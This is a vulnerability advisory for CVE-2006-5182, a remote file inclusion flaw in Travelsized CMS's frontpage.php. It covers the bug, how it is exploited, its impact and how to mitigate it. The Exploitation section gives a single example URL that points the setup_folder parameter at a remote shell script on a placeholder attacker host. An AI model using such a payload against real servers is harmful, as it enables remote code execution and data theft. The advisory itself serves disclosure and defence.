CVE-2006-5182

Vulnerability

Travelsized CMS versions 0.4 and earlier are vulnerable to a PHP remote file inclusion (RFI) flaw in frontpage.php. The script unsafely uses the setup_folder parameter from user input, allowing an attacker to supply a URL to a remote file containing malicious PHP code, which the server then includes and executes. No authentication is required to reach this code path, and the default configuration does not mitigate the dangerous parameter handling [1], [2].

Exploitation

An attacker can exploit this vulnerability by sending an HTTP GET request to the vulnerable CMS installation with a crafted setup_folder parameter pointing to a remote PHP script hosted on an attacker-controlled server. For example: http://target.com/frontpage.php?setup_folder=http://evil.com/shell.txt?. The exploit is straightforward and requires only network access to the target; no authentication, user interaction, or special privileges are needed. A proof-of-concept exploit in Perl has been publicly released [2].

Impact

Successful exploitation allows an attacker to execute arbitrary PHP code on the target server with the privileges of the web server user. This can lead to complete compromise of the CMS, including unauthorized access, data theft, defacement, or further lateral movement within the hosting environment [1], [2].

Mitigation

No official patch or updated version has been released for Travelsized CMS. The software appears to be end-of-life and unmaintained. Users should immediately disable or remove any accessible instances of the CMS, or apply input validation hardening to block URL-sourced parameters in frontpage.php. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date [1], [2].